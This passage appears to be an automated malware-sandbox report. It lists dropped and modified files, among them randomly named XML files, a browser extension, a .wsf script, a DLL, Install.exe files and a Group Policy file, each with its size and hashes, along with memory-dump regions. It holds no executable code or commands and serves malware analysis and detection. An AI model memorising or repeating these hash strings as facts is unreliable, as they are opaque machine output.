                                                                                                              e8e5aab3bccaaf31364fc14a44c2ab33004c2dcd7987cd34342657ebf5a1ef737b723732411733c011e25bd7d2dd1cdb14eb63fd538fe8f9e2f43e188fd61a1a

                                                                                                            • C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR\izElhPb.xml

                                                                                                              Filesize

                                                                                                              2KB

                                                                                                              MD5

                                                                                                              7f074d6d3dc8ba867cb1a9595d75fa82

                                                                                                              SHA1

                                                                                                              ba9940e7d8e308900dd00ccba56792267e8fd760

                                                                                                              SHA256

                                                                                                              013b14d5876c1cd228c502195410fb6fc4e3d5d1bab9ef8b2510aa7559de6afe

                                                                                                              SHA512

                                                                                                              fddece89e378bbc5115792e7d65e08ed0b9e0d72bf36e682891e46c21493ad1a80071eb53bedaf1011859e9c8e7f830504610c3e61305b631dce72f988778562

                                                                                                            • C:\Program Files (x86)\rksWaXujU\dgpWayZ.xml

                                                                                                              Filesize

                                                                                                              2KB

                                                                                                              MD5

                                                                                                              e3124c51196627235f81021202497539

                                                                                                              SHA1

                                                                                                              47c94b60c6beda449239806d837a6aa9db5e9f24

                                                                                                              SHA256

                                                                                                              41fcef80af53d1b93a4f92c8e636572d8c4aeecb5fc3214e6ef61a0225f69b73

                                                                                                              SHA512

                                                                                                              b7b7583d5106f43ba4b28e6963f6d8e934626e79438bc1c33cedc63f04e4b6031caa2ff4f9fa933a61a26bb458b7b59eeea9b38553fe08c59c99cc91242582d8

                                                                                                            • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                                                                              Filesize

                                                                                                              2.0MB

                                                                                                              MD5

                                                                                                              2f02cc2a0c1066593cac569fb44fde98

                                                                                                              SHA1

                                                                                                              cdef228219837ccb3c7061afcd70760ef0b9c720

                                                                                                              SHA256

                                                                                                              a32071cd6aa585d567c0f5425759c85098b1f460ef320f7ad43c9ac635f3fca5

                                                                                                              SHA512

                                                                                                              0f9e6449d02e31fc4ebabd09bf03d454dceb703968b9c53b771512bd045ea7256df091f792b856463d03e5a8e17f40e28c826d20ec710b0cc2e92eee524269f1

                                                                                                            • C:\ProgramData\BiTaXhratCGNPnVB\OqlCPyB.xml

                                                                                                              Filesize

                                                                                                              2KB

                                                                                                              MD5

                                                                                                              a6e25931e5fcd838c93db33dda4ef846

                                                                                                              SHA1

                                                                                                              6bee9fe9acfe5d3901a5748029aa5b1aa14ddf63

                                                                                                              SHA256

                                                                                                              dc0e3e35c22281d704d36d12deb132362a384d008a5bdff0344054d52281d825

                                                                                                              SHA512

                                                                                                              dae9b7d2c5a077e1adc8e8ac289cdbddf621caadea092acb2a06ba5fbfb1f785b0f37e4573d73952ecdc6198ddf78df2900fa6321d647ac8f867899471b3c3bb

                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                                                                              Filesize

                                                                                                              187B

                                                                                                              MD5

                                                                                                              2a1e12a4811892d95962998e184399d8

                                                                                                              SHA1

                                                                                                              55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                              SHA256

                                                                                                              32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                              SHA512

                                                                                                              bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                                                                              Filesize

                                                                                                              136B

                                                                                                              MD5

                                                                                                              238d2612f510ea51d0d3eaa09e7136b1

                                                                                                              SHA1

                                                                                                              0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                              SHA256

                                                                                                              801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                              SHA512

                                                                                                              2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                                                                              Filesize

                                                                                                              150B

                                                                                                              MD5

                                                                                                              0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                              SHA1

                                                                                                              6a51537cef82143d3d768759b21598542d683904

                                                                                                              SHA256

                                                                                                              0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                              SHA512

                                                                                                              5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                              Filesize

                                                                                                              10KB

                                                                                                              MD5

                                                                                                              6263492cad31587eeaebe54841a913de

                                                                                                              SHA1

                                                                                                              c0a0d95fda568a7e87f520654a6e4f673977a659

                                                                                                              SHA256

                                                                                                              484df10437e1288fe4ed95c1458b2520f73227a541e7694b07049d7ea0adf4dc

                                                                                                              SHA512

                                                                                                              f091e9ba9ee052567476341d4ec94d74cf4cd15d5663312f8fd92a22b371c81e0b73d51ebfbe682c8394b22f35242c2961bb41fc51bbbee3426e5ea2ab2c2fee

                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                              Filesize

                                                                                                              7KB

                                                                                                              MD5

                                                                                                              bda73eecb76840daa19eca61711a1c37

                                                                                                              SHA1

                                                                                                              66698dde4c0976da38898bdfdd20c2e016428a7c

                                                                                                              SHA256

                                                                                                              ebc0f7a1d36ee402647fe7d120eae2f4e94fc1bc9f34e82b725b3cf66b4c7d67

                                                                                                              SHA512

                                                                                                              bf9215b47fd38fd33a397be8b7611c5b5690cc27d0a2f6d0b2c5ef359f4565a1255e510390dc1e67e3591e246a93b36a7800937e692b2604415c303592702b79

                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                              Filesize

                                                                                                              7KB

                                                                                                              MD5

                                                                                                              0a567b8bc8378e2a5dd6826b76a4d6f2

                                                                                                              SHA1

                                                                                                              b42c32e919e27d08a9938ba9e2f3dd1a54ffee7e

                                                                                                              SHA256

                                                                                                              710f43401f05cceb56c8e634c6a517e6d710cb8d76eea3382ce6ce1f3c30fbd8

                                                                                                              SHA512

                                                                                                              86e3ee33bc40ecfab36fec49305e5c473ec1b6ad91bc9ddf145f5207860cfc7bbedc0bc0113e2f187809a9b4bf359af935269932e24fa1848f0acea19ca9fc2d

                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                                                                                                              Filesize

                                                                                                              7KB

                                                                                                              MD5

                                                                                                              3857a9ee970ee59e1dd9aa5993b2acab

                                                                                                              SHA1

                                                                                                              74ac17d38a75eff4b318822cca3ce293fe48e21a

                                                                                                              SHA256

                                                                                                              0413cde3bfca7a186dd6db0a26a3bfc158d583dd26ecfbebb45a8fde30519f85

                                                                                                              SHA512

                                                                                                              716ca6ffe580ecf08ecce8cd52a88046b62426a0cfecc3ff1bcfc7279547a9f1d11af7b431ce268b08b215da1b7ee4ed4c3fddc8d6458355ec2541b4b906baec

                                                                                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\prefs.js

                                                                                                              Filesize

                                                                                                              7KB

                                                                                                              MD5

                                                                                                              5b2812a8def01bd36355568e3b58d8fb

                                                                                                              SHA1

                                                                                                              9fbd359a46014c36a97184fc89ee3b6137222afb

                                                                                                              SHA256

                                                                                                              2aa04fd9a7b6120bd225557cf6d140d69d2a2482df62a4b894d7080552453734

                                                                                                              SHA512

                                                                                                              deabf5082da0173a5391e6deb8ec0e91a3636a2c7660306cca2d7026f6fc6b9199950fe14d6f3308fd77fe29cf46cb0dba4b2f664f9cf04016b994e6716ca038

                                                                                                            • C:\Windows\Temp\ErKIoDgHiflivqkZ\CYsQOwTc\uRthnpKRNaMTwjKB.wsf

                                                                                                              Filesize

                                                                                                              9KB

                                                                                                              MD5

                                                                                                              324f0455234fecd0e180f82174522dc4

                                                                                                              SHA1

                                                                                                              845e4b74bdffd042b5fb975d64bb21c731009d3a

                                                                                                              SHA256

                                                                                                              157adfff9722ed4036505039889f7645a0a3e9f410d0a8469a57a22b12a7bc34

                                                                                                              SHA512

                                                                                                              f3a5ecc3063b76eb3c9214cbc7bae1ac5c39fe20cdd451be5ecf8d757ea59a4bc9872601aa4c2adc71416ea8c16f836d7ee80d10d3b3c55caac2c5025c7dbd79

                                                                                                            • C:\Windows\Temp\ErKIoDgHiflivqkZ\dCdkihji\aMTozzm.dll

                                                                                                              Filesize

                                                                                                              6.5MB

                                                                                                              MD5

                                                                                                              cfe428169166545941ae665ac1d2578c

                                                                                                              SHA1

                                                                                                              8820ba8de5ce6658c6968f40117b5e8a3a1f4eab

                                                                                                              SHA256

                                                                                                              fd819cf2f5db063ba817d32d14ca2e5d75364807cc9ba53248dfc1578b90dc53

                                                                                                              SHA512

                                                                                                              49442efba4dc52121d6e5f91210a73a9479682cc976b90da333bc601f3789e12588cfd3933eafe7ce260ef93b2d8eade6f31b0d65c5ca0728e8df961e8a36d96

                                                                                                            • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                              Filesize

                                                                                                              6KB

                                                                                                              MD5

                                                                                                              c559b9e00b20d6f92cc813d899a4e100

                                                                                                              SHA1

                                                                                                              4803773dcbcf83fcc99830267b4149369909491e

                                                                                                              SHA256

                                                                                                              138cf60e1e9329ae6b5fdf3448f33e5c482c72814777ef709bfa902843232745

                                                                                                              SHA512

                                                                                                              3649030e1663627e11dbc56f6073026f2438d9047db218eee2de8ab012a020491324250056cf81c9da85668ddb7efbd2bf5a36790932dfdfb7c1ed38e28c6471

                                                                                                            • \Users\Admin\AppData\Local\Temp\7zSC67A.tmp\Install.exe

                                                                                                              Filesize

                                                                                                              6.4MB

                                                                                                              MD5

                                                                                                              aaef9b8c0610b8465e21846d327686bb

                                                                                                              SHA1

                                                                                                              82ec975f472399b0d82e60df0312b866e0f91709

                                                                                                              SHA256

                                                                                                              dc7b0a8e34ab5558f0fb0a52a92261556110d1ce094f34be8fcbe408535fc379

                                                                                                              SHA512

                                                                                                              4f33cd8fc62e109d3a598a4630ffc2603827a3b4b49ae2e7a184585ca7ea83790d9b3f60d46889606c940cf46bfe949d41339bf2d70383dad43c3ce160176119

                                                                                                            • \Users\Admin\AppData\Local\Temp\7zSC8CB.tmp\Install.exe

                                                                                                              Filesize

                                                                                                              6.6MB

                                                                                                              MD5

                                                                                                              d121107c5261ab15018ad1e759aa45a5

                                                                                                              SHA1

                                                                                                              c8753c8765f20a1187ffb749f3a5592276e2415f

                                                                                                              SHA256

                                                                                                              30afb4810b65dd25f3883bea4158c3e00d2c666260cdeb880b105f11aab89d61

                                                                                                              SHA512

                                                                                                              c5ec43cc109c57f4c3eec34dfcf2b17f6791415dff8b6e780bceed4c8bd6cd90ac962b4beb712d489bb7ab78c7b4537623594f56d2cbc6becc020d7d38dfd41b

                                                                                                            • memory/612-319-0x0000000002C30000-0x0000000002CBC000-memory.dmp

                                                                                                              Filesize

                                                                                                              560KB

                                                                                                            • memory/612-329-0x0000000002A10000-0x0000000002AE3000-memory.dmp

                                                                                                              Filesize

                                                                                                              844KB

                                                                                                            • memory/612-87-0x00000000002E0000-0x0000000000987000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                            • memory/612-89-0x0000000010000000-0x00000000105E3000-memory.dmp

                                                                                                              Filesize

                                                                                                              5.9MB

                                                                                                            • memory/612-101-0x0000000002200000-0x0000000002285000-memory.dmp

                                                                                                              Filesize

                                                                                                              532KB

                                                                                                            • memory/612-364-0x00000000002E0000-0x0000000000987000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                            • memory/612-135-0x00000000002E0000-0x0000000000987000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                            • memory/612-136-0x00000000025E0000-0x0000000002648000-memory.dmp

                                                                                                              Filesize

                                                                                                              416KB

                                                                                                            • memory/2068-44-0x0000000000D00000-0x00000000013A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                            • memory/2068-46-0x0000000010000000-0x00000000105E3000-memory.dmp

                                                                                                              Filesize

                                                                                                              5.9MB

                                                                                                            • memory/2068-88-0x0000000000D00000-0x00000000013A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                            • memory/2068-58-0x0000000000D00000-0x00000000013A7000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                            • memory/2116-39-0x0000000001130000-0x00000000017D7000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                            • memory/2116-29-0x0000000010000000-0x00000000105E3000-memory.dmp

                                                                                                              Filesize

                                                                                                              5.9MB

                                                                                                            • memory/2116-23-0x0000000001130000-0x00000000017D7000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                            • memory/2116-24-0x00000000009B0000-0x0000000001057000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                            • memory/2116-25-0x00000000009B0000-0x0000000001057000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                            • memory/2116-26-0x00000000009B0000-0x0000000001057000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                            • memory/2276-68-0x000000001B590000-0x000000001B872000-memory.dmp

                                                                                                              Filesize

                                                                                                              2.9MB

                                                                                                            • memory/2276-69-0x00000000027A0000-0x00000000027A8000-memory.dmp

                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/2312-18-0x00000000024A0000-0x0000000002B47000-memory.dmp

                                                                                                              Filesize

                                                                                                              6.7MB

                                                                                                            • memory/2396-57-0x0000000002040000-0x0000000002048000-memory.dmp

                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/2396-56-0x000000001B750000-0x000000001BA32000-memory.dmp

                                                                                                              Filesize

                                                                                                              2.9MB

                                                                                                            • memory/2704-352-0x0000000001310000-0x00000000018F3000-memory.dmp

                                                                                                              Filesize

                                                                                                              5.9MB